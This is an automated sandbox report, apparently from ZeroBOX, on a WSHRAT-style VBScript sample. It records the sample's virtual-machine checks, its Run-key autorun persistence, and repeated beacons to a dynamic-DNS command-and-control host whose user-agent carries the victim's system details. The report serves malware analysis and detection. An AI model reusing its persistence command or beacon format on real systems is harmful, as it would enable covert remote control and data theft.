Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 18, 2023, 9:59 a.m.	Aug. 18, 2023, 10:02 a.m.

Size	257.4KB
Type	Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
MD5	`d87d4c42c10f332a96aa10ffb455f49d`
SHA256	`5ad4d5fb75a277e31b05e1a6f19c5fc3c007b5c2be03109d876ca457173a135a`
CRC32	`60BA0FE0`
ssdeep	`384:GWbSLcLgOioL0XHys4KJPlTkXZ64SAzu7t7Q0TDh7O74DJxWO0K6dBjcOXoxAFuR:GZ8BcmuMwg4`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\wpp.vbs
2564

Name	Response	Post-Analysis Lookup
chongmei33.publicvm.com	A 103.47.144.122	103.47.144.122

IP Address	Status	Action
103.47.144.122	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 100 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 18, 2023, 10 a.m.	computer_name: TEST22-PC	1	1

Connects to a Dynamic DNS Domain (1 event)

domain

chongmei33.publicvm.com

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (20 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252935 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252924 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252924 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252924 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252924 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252924 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252924 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 2934095 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 2934095 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10 a.m.	number_of_free_clusters: 3252904 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252904 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252776 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252776 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252770 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252770 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252770 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252770 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252770 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252770 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Aug. 18, 2023, 10:01 a.m.	number_of_free_clusters: 3252769 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

Wscript.exe initiated network communications indicative of a script based payload download (40 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Aug. 18, 2023, 10:01 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10:01 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356

Installs itself for autorun at Windows startup (42 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wpp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wpp.vbs"

Executes one or more WMI queries (3 events)

wmi	select * from antivirusproduct
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk

wscript.exe-based dropper (JScript, VBS) (20 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 100 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1084 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1108 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1116 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1112 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1084 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
send Aug. 18, 2023, 10 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-08-18\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1084 sent: 324	1	324
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
InternetCrackUrlW Aug. 18, 2023, 10 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Aug. 18, 2023, 10 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Aug. 18, 2023, 10 a.m.	buffer: ! socket: 1000 sent: 1	1	1
